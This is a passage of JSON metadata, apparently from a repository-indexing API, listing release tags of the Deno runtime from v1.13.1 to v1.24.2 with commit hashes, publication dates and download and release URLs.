https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1